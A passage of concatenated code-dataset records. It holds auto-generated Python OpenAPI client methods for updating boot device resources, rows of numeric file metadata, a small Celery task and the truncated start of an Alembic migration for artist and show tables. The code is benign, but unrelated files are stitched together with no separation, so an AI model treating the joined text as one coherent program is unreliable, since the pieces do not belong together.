'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['boot_nvme_device'] = \
boot_nvme_device
return self.call_with_http_info(**kwargs)
self.update_boot_nvme_device = _Endpoint(
settings={
'response_type': (BootNvmeDevice,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/NvmeDevices/{Moid}',
'operation_id': 'update_boot_nvme_device',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'moid',
'boot_nvme_device',
'if_match',
],
'required': [
'moid',
'boot_nvme_device',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'boot_nvme_device':
(BootNvmeDevice,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'boot_nvme_device': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__update_boot_nvme_device
)
def __update_boot_pch_storage_device(
self,
moid,
boot_pch_storage_device,
**kwargs
):
"""Update a 'boot.PchStorageDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_boot_pch_storage_device(moid, boot_pch_storage_device, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
boot_pch_storage_device (BootPchStorageDevice): The 'boot.PchStorageDevice' resource to update.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootPchStorageDevice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['boot_pch_storage_device'] = \
boot_pch_storage_device
return self.call_with_http_info(**kwargs)
self.update_boot_pch_storage_device = _Endpoint(
settings={
'response_type': (BootPchStorageDevice,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/PchStorageDevices/{Moid}',
'operation_id': 'update_boot_pch_storage_device',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'moid',
'boot_pch_storage_device',
'if_match',
],
'required': [
'moid',
'boot_pch_storage_device',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'boot_pch_storage_device':
(BootPchStorageDevice,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'boot_pch_storage_device': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__update_boot_pch_storage_device
)
def __update_boot_precision_policy(
self,
moid,
boot_precision_policy,
**kwargs
):
"""Update a 'boot.PrecisionPolicy' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_boot_precision_policy(moid, boot_precision_policy, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
boot_precision_policy (BootPrecisionPolicy): The 'boot.PrecisionPolicy' resource to update.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootPrecisionPolicy
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['boot_precision_policy'] = \
boot_precision_policy
return self.call_with_http_info(**kwargs)
self.update_boot_precision_policy = _Endpoint(
settings={
'response_type': (BootPrecisionPolicy,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/PrecisionPolicies/{Moid}',
'operation_id': 'update_boot_precision_policy',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'moid',
'boot_precision_policy',
'if_match',
],
'required': [
'moid',
'boot_precision_policy',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'boot_precision_policy':
(BootPrecisionPolicy,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'boot_precision_policy': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__update_boot_precision_policy
)
def __update_boot_pxe_device(
self,
moid,
boot_pxe_device,
**kwargs
):
"""Update a 'boot.PxeDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_boot_pxe_device(moid, boot_pxe_device, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
boot_pxe_device (BootPxeDevice): The 'boot.PxeDevice' resource to update.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootPxeDevice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['boot_pxe_device'] = \
boot_pxe_device
return self.call_with_http_info(**kwargs)
self.update_boot_pxe_device = _Endpoint(
settings={
'response_type': (BootPxeDevice,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/PxeDevices/{Moid}',
'operation_id': 'update_boot_pxe_device',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'moid',
'boot_pxe_device',
'if_match',
],
'required': [
'moid',
'boot_pxe_device',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'boot_pxe_device':
(BootPxeDevice,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'boot_pxe_device': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__update_boot_pxe_device
)
def __update_boot_san_device(
self,
moid,
boot_san_device,
**kwargs
):
"""Update a 'boot.SanDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_boot_san_device(moid, boot_san_device, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
boot_san_device (BootSanDevice): The 'boot.SanDevice' resource to update.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootSanDevice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['boot_san_device'] = \
boot_san_device
return self.call_with_http_info(**kwargs)
self.update_boot_san_device = _Endpoint(
settings={
'response_type': (BootSanDevice,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/SanDevices/{Moid}',
'operation_id': 'update_boot_san_device',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'moid',
'boot_san_device',
'if_match',
],
'required': [
'moid',
'boot_san_device',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'boot_san_device':
(BootSanDevice,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'boot_san_device': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__update_boot_san_device
)
def __update_boot_sd_device(
self,
moid,
boot_sd_device,
**kwargs
):
"""Update a 'boot.SdDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_boot_sd_device(moid, boot_sd_device, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
boot_sd_device (BootSdDevice): The 'boot.SdDevice' resource to update.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootSdDevice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['boot_sd_device'] = \
boot_sd_device
return self.call_with_http_info(**kwargs)
self.update_boot_sd_device = _Endpoint(
settings={
'response_type': (BootSdDevice,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/SdDevices/{Moid}',
'operation_id': 'update_boot_sd_device',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'moid',
'boot_sd_device',
'if_match',
],
'required': [
'moid',
'boot_sd_device',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'boot_sd_device':
(BootSdDevice,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'boot_sd_device': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__update_boot_sd_device
)
def __update_boot_uefi_shell_device(
self,
moid,
boot_uefi_shell_device,
**kwargs
):
"""Update a 'boot.UefiShellDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_boot_uefi_shell_device(moid, boot_uefi_shell_device, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
boot_uefi_shell_device (BootUefiShellDevice): The 'boot.UefiShellDevice' resource to update.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootUefiShellDevice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['boot_uefi_shell_device'] = \
boot_uefi_shell_device
return self.call_with_http_info(**kwargs)
self.update_boot_uefi_shell_device = _Endpoint(
settings={
'response_type': (BootUefiShellDevice,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/UefiShellDevices/{Moid}',
'operation_id': 'update_boot_uefi_shell_device',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'moid',
'boot_uefi_shell_device',
'if_match',
],
'required': [
'moid',
'boot_uefi_shell_device',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'boot_uefi_shell_device':
(BootUefiShellDevice,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'boot_uefi_shell_device': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__update_boot_uefi_shell_device
)
def __update_boot_usb_device(
self,
moid,
boot_usb_device,
**kwargs
):
"""Update a 'boot.UsbDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_boot_usb_device(moid, boot_usb_device, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
boot_usb_device (BootUsbDevice): The 'boot.UsbDevice' resource to update.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootUsbDevice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['boot_usb_device'] = \
boot_usb_device
return self.call_with_http_info(**kwargs)
self.update_boot_usb_device = _Endpoint(
settings={
'response_type': (BootUsbDevice,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/UsbDevices/{Moid}',
'operation_id': 'update_boot_usb_device',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'moid',
'boot_usb_device',
'if_match',
],
'required': [
'moid',
'boot_usb_device',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'boot_usb_device':
(BootUsbDevice,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'boot_usb_device': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__update_boot_usb_device
)
def __update_boot_vmedia_device(
self,
moid,
boot_vmedia_device,
**kwargs
):
"""Update a 'boot.VmediaDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_boot_vmedia_device(moid, boot_vmedia_device, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
boot_vmedia_device (BootVmediaDevice): The 'boot.VmediaDevice' resource to update.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootVmediaDevice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['boot_vmedia_device'] = \
boot_vmedia_device
return self.call_with_http_info(**kwargs)
self.update_boot_vmedia_device = _Endpoint(
settings={
'response_type': (BootVmediaDevice,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/VmediaDevices/{Moid}',
'operation_id': 'update_boot_vmedia_device',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'moid',
'boot_vmedia_device',
'if_match',
],
'required': [
'moid',
'boot_vmedia_device',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'boot_vmedia_device':
(BootVmediaDevice,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'boot_vmedia_device': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__update_boot_vmedia_device
)
| 46.317133
| 1,678
| 0.509696
| 38,130
| 393,603
| 5.090139
| 0.015526
| 0.018827
| 0.015539
| 0.016137
| 0.975666
| 0.971703
| 0.96213
| 0.956349
| 0.956133
| 0.954412
| 0
| 0.002728
| 0.41519
| 393,603
| 8,497
| 1,679
| 46.322584
| 0.840457
| 0.437075
| 0
| 0.767658
| 0
| 0
| 0.228145
| 0.055268
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009806
| false
| 0
| 0.005484
| 0
| 0.025096
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
380d43744215fb14d018f9e2faf67475e98917f8
| 92
|
py
|
Python
|
djaein/personal/tasks.py
|
0PEIN0/djaein
|
ec02d977ff323c232ddca66cf97cf8824eeb9f93
|
[
"MIT"
] | null | null | null |
djaein/personal/tasks.py
|
0PEIN0/djaein
|
ec02d977ff323c232ddca66cf97cf8824eeb9f93
|
[
"MIT"
] | null | null | null |
djaein/personal/tasks.py
|
0PEIN0/djaein
|
ec02d977ff323c232ddca66cf97cf8824eeb9f93
|
[
"MIT"
] | null | null | null |
from celery import shared_task
@shared_task
def mark_old_to_do_as_done():
return True
| 13.142857
| 30
| 0.793478
| 16
| 92
| 4.125
| 0.875
| 0.30303
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.163043
| 92
| 6
| 31
| 15.333333
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.25
| 0.25
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
69765513b07c24a18965d7e495e0f85a327bc2eb
| 3,925
|
py
|
Python
|
migrations/versions/590c9969421e_.py
|
ahmedsalahacc/fyur
|
7289e94e08b0dc3fa460d5a10535eaf59a9561e9
|
[
"MIT"
] | null | null | null |
migrations/versions/590c9969421e_.py
|
ahmedsalahacc/fyur
|
7289e94e08b0dc3fa460d5a10535eaf59a9561e9
|
[
"MIT"
] | null | null | null |
migrations/versions/590c9969421e_.py
|
ahmedsalahacc/fyur
|
7289e94e08b0dc3fa460d5a10535eaf59a9561e9
|
[
"MIT"
] | null | null | null |
"""empty message
Revision ID: 590c9969421e
Revises: 129dcb5dac70
Create Date: 2020-09-20 13:52:19.620499
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = '590c9969421e'
down_revision = '129dcb5dac70'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('Artists',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(), nullable=False),
sa.Column('city', sa.String(length=120), nullable=False),
sa.Column('state', sa.String(length=120), nullable=False),
sa.Column('phone', sa.String(length=120), nullable=False),
sa.Column('genres', sa.String(length=120), nullable=False),
sa.Column('image_link', sa.String(length=500), nullable=False),
sa.Column('facebook_link', sa.String(length=120), nullable=False),
sa.PrimaryKeyConstraint('id')
)
op.create_table('Shows',
sa.Column('id', sa.Integer(), nullable=False),
